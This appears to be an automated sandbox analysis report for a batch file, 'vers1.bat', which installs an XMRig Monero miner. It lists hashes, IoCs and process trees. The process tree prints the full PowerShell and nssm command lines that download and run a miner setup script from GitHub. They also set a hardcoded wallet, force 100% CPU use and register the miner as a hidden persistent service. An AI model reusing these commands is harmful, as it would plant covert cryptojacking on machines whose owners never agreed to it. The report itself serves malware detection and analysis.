Overview
overview
10Static
static
1vers1.bat
windows10-2004-x64
10vers1.bat
windows10-1703-x64
10vers1.bat
windows7-x64
10vers1.bat
windows10-2004-x64
10vers1.bat
windows11-21h2-x64
10vers1.bat
android-9-x86
vers1.bat
android-10-x64
vers1.bat
android-11-x64
vers1.bat
macos-10.15-amd64
1vers1.bat
macos-10.15-amd64
1Analysis
-
max time kernel
1049s -
max time network
1045s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
25-06-2024 16:20
Static task
static1
Behavioral task
behavioral1
Sample
vers1.bat
Resource
win10v2004-20240611-en
Behavioral task
behavioral2
Sample
vers1.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
vers1.bat
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
vers1.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
vers1.bat
Resource
win11-20240419-en
Behavioral task
behavioral6
Sample
vers1.bat
Resource
android-x86-arm-20240624-en
Behavioral task
behavioral7
Sample
vers1.bat
Resource
android-x64-20240624-en
Behavioral task
behavioral8
Sample
vers1.bat
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral9
Sample
vers1.bat
Resource
macos-20240611-en
Behavioral task
behavioral10
Sample
vers1.bat
Resource
macos-20240611-en
General
-
Target
vers1.bat
-
Size
393B
-
MD5
ece9925dc634f1cc20e3fd7ff7a144bd
-
SHA1
8816112e72b7b64a668bf7214999d855a7e05bde
-
SHA256
a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f
-
SHA512
bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243
Malware Config
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip
Signatures
-
XMRig Miner payload 54 IoCs
resource yara_rule behavioral1/files/0x00070000000235cd-63.dat family_xmrig behavioral1/files/0x00070000000235cd-63.dat xmrig behavioral1/memory/4912-66-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-200-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-201-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-202-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-203-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-204-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-205-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-206-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-223-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-224-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-225-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-226-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-227-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-228-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-230-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-231-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-232-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-233-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-234-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-235-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-236-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-237-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-238-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-239-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-240-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-241-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-242-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-243-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-244-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-245-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-246-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-247-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-249-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-250-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-251-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-252-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-253-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-254-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-255-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-256-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-257-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-258-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-259-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-260-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-261-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-262-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-263-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-264-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-265-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-266-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-267-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/972-268-0x0000000000400000-0x000000000102B000-memory.dmp xmrig -
Blocklisted process makes network request 3 IoCs
flow pid Process 6 4112 powershell.exe 31 3928 powershell.exe 35 1944 powershell.exe -
Executes dropped EXE 9 IoCs
pid Process 4912 xmrig.exe 1388 nssm.exe 1608 nssm.exe 4076 nssm.exe 456 nssm.exe 968 nssm.exe 4388 nssm.exe 2336 nssm.exe 972 xmrig.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 4 raw.githubusercontent.com 6 raw.githubusercontent.com 31 raw.githubusercontent.com 35 raw.githubusercontent.com -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5092 sc.exe 2188 sc.exe 736 sc.exe 1224 sc.exe -
pid Process 2832 powershell.exe 2020 powershell.exe 5012 powershell.exe 872 powershell.exe 1944 powershell.exe 3824 powershell.exe 336 powershell.exe 2092 powershell.exe 3928 powershell.exe 2556 powershell.exe 4112 powershell.exe 4864 powershell.exe 2828 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2088 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 2020 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4112 powershell.exe 4112 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 3824 powershell.exe 3824 powershell.exe 3824 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 336 powershell.exe 336 powershell.exe 336 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 2092 powershell.exe 2092 powershell.exe 2092 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 4864 powershell.exe 4864 powershell.exe 4864 powershell.exe 2828 powershell.exe 2828 powershell.exe 2828 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4324 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 4112 powershell.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 3824 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 336 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 4864 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeLockMemoryPrivilege 972 xmrig.exe Token: SeDebugPrivilege 4324 taskmgr.exe Token: SeSystemProfilePrivilege 4324 taskmgr.exe Token: SeCreateGlobalPrivilege 4324 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 972 xmrig.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe 4324 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4872 wrote to memory of 4112 4872 cmd.exe 91 PID 4872 wrote to memory of 4112 4872 cmd.exe 91 PID 4112 wrote to memory of 4700 4112 powershell.exe 95 PID 4112 wrote to memory of 4700 4112 powershell.exe 95 PID 4700 wrote to memory of 1516 4700 cmd.exe 96 PID 4700 wrote to memory of 1516 4700 cmd.exe 96 PID 1516 wrote to memory of 4164 1516 net.exe 97 PID 1516 wrote to memory of 4164 1516 net.exe 97 PID 4700 wrote to memory of 3460 4700 cmd.exe 98 PID 4700 wrote to memory of 3460 4700 cmd.exe 98 PID 4700 wrote to memory of 1260 4700 cmd.exe 99 PID 4700 wrote to memory of 1260 4700 cmd.exe 99 PID 4700 wrote to memory of 3416 4700 cmd.exe 100 PID 4700 wrote to memory of 3416 4700 cmd.exe 100 PID 4700 wrote to memory of 1984 4700 cmd.exe 101 PID 4700 wrote to memory of 1984 4700 cmd.exe 101 PID 4700 wrote to memory of 3952 4700 cmd.exe 102 PID 4700 wrote to memory of 3952 4700 cmd.exe 102 PID 4700 wrote to memory of 1224 4700 cmd.exe 104 PID 4700 wrote to memory of 1224 4700 cmd.exe 104 PID 4700 wrote to memory of 5092 4700 cmd.exe 105 PID 4700 wrote to memory of 5092 4700 cmd.exe 105 PID 4700 wrote to memory of 2020 4700 cmd.exe 106 PID 4700 wrote to memory of 2020 4700 cmd.exe 106 PID 4700 wrote to memory of 2088 4700 cmd.exe 108 PID 4700 wrote to memory of 2088 4700 cmd.exe 108 PID 4700 wrote to memory of 3928 4700 cmd.exe 113 PID 4700 wrote to memory of 3928 4700 cmd.exe 113 PID 4700 wrote to memory of 2832 4700 cmd.exe 114 PID 4700 wrote to memory of 2832 4700 cmd.exe 114 PID 4700 wrote to memory of 3824 4700 cmd.exe 115 PID 4700 wrote to memory of 3824 4700 cmd.exe 115 PID 4700 wrote to memory of 4912 4700 cmd.exe 117 PID 4700 wrote to memory of 4912 4700 cmd.exe 117 PID 4700 wrote to memory of 4844 4700 cmd.exe 119 PID 4700 wrote to memory of 4844 4700 cmd.exe 119 PID 4844 wrote to memory of 2020 4844 cmd.exe 120 PID 4844 wrote to memory of 2020 4844 cmd.exe 120 PID 2020 wrote to memory of 1376 2020 powershell.exe 121 PID 2020 wrote to memory of 1376 2020 powershell.exe 121 PID 4700 wrote to memory of 336 4700 cmd.exe 122 PID 4700 wrote to memory of 336 4700 cmd.exe 122 PID 4700 wrote to memory of 5012 4700 cmd.exe 123 PID 4700 wrote to memory of 5012 4700 cmd.exe 123 PID 4700 wrote to memory of 2092 4700 cmd.exe 124 PID 4700 wrote to memory of 2092 4700 cmd.exe 124 PID 4700 wrote to memory of 872 4700 cmd.exe 125 PID 4700 wrote to memory of 872 4700 cmd.exe 125 PID 4700 wrote to memory of 4864 4700 cmd.exe 126 PID 4700 wrote to memory of 4864 4700 cmd.exe 126 PID 4700 wrote to memory of 2828 4700 cmd.exe 128 PID 4700 wrote to memory of 2828 4700 cmd.exe 128 PID 4700 wrote to memory of 1944 4700 cmd.exe 129 PID 4700 wrote to memory of 1944 4700 cmd.exe 129 PID 4700 wrote to memory of 2556 4700 cmd.exe 130 PID 4700 wrote to memory of 2556 4700 cmd.exe 130 PID 4700 wrote to memory of 2188 4700 cmd.exe 131 PID 4700 wrote to memory of 2188 4700 cmd.exe 131 PID 4700 wrote to memory of 736 4700 cmd.exe 132 PID 4700 wrote to memory of 736 4700 cmd.exe 132 PID 4700 wrote to memory of 1388 4700 cmd.exe 133 PID 4700 wrote to memory of 1388 4700 cmd.exe 133 PID 4700 wrote to memory of 1608 4700 cmd.exe 134 PID 4700 wrote to memory of 1608 4700 cmd.exe 134
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDE4A.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"3⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\net.exenet session4⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session5⤵PID:4164
-
-
-
C:\Windows\system32\where.exewhere powershell4⤵PID:3460
-
-
C:\Windows\system32\where.exewhere find4⤵PID:1260
-
-
C:\Windows\system32\where.exewhere findstr4⤵PID:3416
-
-
C:\Windows\system32\where.exewhere tasklist4⤵PID:1984
-
-
C:\Windows\system32\where.exewhere sc4⤵PID:3952
-
-
C:\Windows\system32\sc.exesc stop moneroocean_miner4⤵
- Launches sc.exe
PID:1224
-
-
C:\Windows\system32\sc.exesc delete moneroocean_miner4⤵
- Launches sc.exe
PID:5092
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im xmrig.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\system32\timeout.exetimeout 54⤵
- Delays execution with timeout.exe
PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
C:\Users\Admin\moneroocean\xmrig.exe"C:\Users\Admin\moneroocean\xmrig.exe" --help4⤵
- Executes dropped EXE
PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"4⤵
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"6⤵PID:1376
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Pxhstppu\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\system32\sc.exesc stop moneroocean_miner4⤵
- Launches sc.exe
PID:2188
-
-
C:\Windows\system32\sc.exesc delete moneroocean_miner4⤵
- Launches sc.exe
PID:736
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"4⤵
- Executes dropped EXE
PID:1388
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"4⤵
- Executes dropped EXE
PID:1608
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS4⤵
- Executes dropped EXE
PID:4076
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"4⤵
- Executes dropped EXE
PID:456
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"4⤵
- Executes dropped EXE
PID:968
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner4⤵
- Executes dropped EXE
PID:4388
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3456,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4460 /prefetch:81⤵PID:1384
-
C:\Users\Admin\moneroocean\nssm.exeC:\Users\Admin\moneroocean\nssm.exe1⤵
- Executes dropped EXE
PID:2336 -
C:\Users\Admin\moneroocean\xmrig.exe"C:\Users\Admin\moneroocean\xmrig.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:972
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3424,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:81⤵PID:1612
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD55b5352c55a8e79ac8de4be3202d496a1
SHA14a263d9e36e5ef972e4b19035cae169e1df6459c
SHA256eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8
SHA512c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63
-
Filesize
1KB
MD5b8e8fb4647b7f417e2b9fab7e0771c6f
SHA1647fafa46d1b39b770d44abd472382ad426aad4a
